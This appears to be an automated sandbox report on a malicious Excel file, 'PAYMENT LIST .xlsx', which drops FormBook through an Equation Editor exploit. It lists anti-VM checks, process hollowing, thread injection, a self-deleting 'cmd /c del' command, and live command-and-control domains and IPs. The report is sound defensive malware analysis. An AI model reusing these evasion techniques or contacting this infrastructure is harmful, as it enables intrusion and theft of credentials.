          Source: 4.2.vbc.exe.1300000.3.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 4.0.vbc.exe.1300000.0.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'TransformFinalBlock'
          Source: 4.0.vbc.exe.1300000.0.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 5.2.vbc.exe.1300000.4.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'TransformFinalBlock'
          Source: 5.2.vbc.exe.1300000.4.unpack, BowenTheatre.Bookings/Encrypta??o.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: explorer.exe, 00000006.00000000.2181421979.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/6@8/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PAYMENT LIST .xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAB9.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PAYMENT LIST .xlsxReversingLabs: Detection: 23%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: PAYMENT LIST .xlsxStatic file information: File size 2593792 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.2222782465.0000000000250000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, msiexec.exe
          Source: PAYMENT LIST .xlsxInitial sample: OLE indicators vbamacros = False
          Source: PAYMENT LIST .xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0130A95E push es; retn 0001h
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00326166 push B8FFFFE3h; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004150F6 push 689916F9h; iretd
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182BB push es; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00410BA4 push ecx; retf
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0130A95E push es; retn 0001h
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0265DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A50F6 push 689916F9h; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A82BB push es; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB3B5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB40B push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB402 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AC410 pushad ; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000AB46C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_000A0BA4 push ecx; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.16615950134
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: PAYMENT LIST .xlsxStream path 'EncryptedPackage' entropy: 7.99992561194 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 824, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000000985E4 second address: 00000000000985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 000000000009897E second address: 0000000000098984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2304Thread sleep time: -180000s >= -30000s
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2304Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 1980Thread sleep time: -54890s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2896Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2152Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: explorer.exe, 00000006.00000002.2379743247.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2182063382.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.2182094888.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.2182054189.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01dRom0
          Source: explorer.exe, 00000006.00000000.2182054189.0000000004226000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD01
          Source: explorer.exe, 00000006.00000000.2182063382.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.2169785572.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2168164981.00000000027C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_026626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 184.72.229.176 80
          Source: C:\Windows\explorer.exeNetwork Connect: 156.240.35.23 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.24.200.168 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 5F0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000006.00000000.2170553734.00000000006F0000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.2379979401.0000000000A60000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2170553734.00000000006F0000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.2379979401.0000000000A60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2379743247.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2170553734.00000000006F0000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.2379979401.0000000000A60000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2222809957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379572834.0000000000090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379681333.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222743183.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2379729780.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2168902799.00000000037C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2222674041.0000000000130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 344799 Sample: PAYMENT LIST .xlsx Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 14 other signatures 2->56 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 37 17 2->14         started        process3 dnsIp4 36 kungsb2sndygotchtsnp.dns.army 103.99.1.149, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 9->36 30 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 9->30 dropped 32 C:\Users\Public\vbc.exe, PE32 9->32 dropped 74 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->74 16 vbc.exe 9->16         started        34 C:\Users\user\Desktop\~$PAYMENT LIST .xlsx, data 14->34 dropped file5 signatures6 process7 signatures8 44 Machine Learning detection for dropped file 16->44 46 Tries to detect virtualization through RDTSC time measurements 16->46 48 Injects a PE file into a foreign processes 16->48 19 vbc.exe 16->19         started        process9 signatures10 58 Modifies the context of a thread in another process (thread injection) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Sample uses process hollowing technique 19->62 64 Queues an APC in another process (thread injection) 19->64 22 msiexec.exe 19->22         started        25 explorer.exe 19->25 injected process11 dnsIp12 66 Modifies the context of a thread in another process (thread injection) 22->66 68 Maps a DLL or memory area into another process 22->68 70 Tries to detect virtualization through RDTSC time measurements 22->70 28 cmd.exe 22->28         started        38 www.doxinlabs.com 103.24.200.168, 49170, 80 ISSPL-INIBEESoftwareSolutionsPvtLtdIN India 25->38 40 kerifletcherrock.com 34.102.136.180, 49166, 49168, 80 GOOGLEUS United States 25->40 42 6 other IPs or domains 25->42 72 System process connects to network (likely due to code injection or exploit) 25->72 signatures13 process14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PAYMENT LIST .xlsx24%ReversingLabsDocument-Office.Exploit.Heuristic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msiexec.exe.5f0000.1.unpack100%AviraHEUR/AGEN.1104764Download File
          5.2.vbc.exe.250000.0.unpack100%AviraHEUR/AGEN.1104764Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://www.doxinlabs.com/oean/?jvylC6k0=0eja1hG/9tz86IL7VglQafiQyvHA2C4h7eUbaFgtY0eGgr750jLj1uDPdaibWffUDCzVWQ==&gnj80=CJBh7xO8zrtpcTq0%Avira URL Cloudsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.opmania36.com/oean/?jvylC6k0=f3eeGK1+0gCIvCWlFxxcFkAkVp6uwJz7C95spmYKsMNPFPV4KfhW/w3yTMrsoyUuOs+/YQ==&gnj80=CJBh7xO8zrtpcTq0%Avira URL Cloudsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
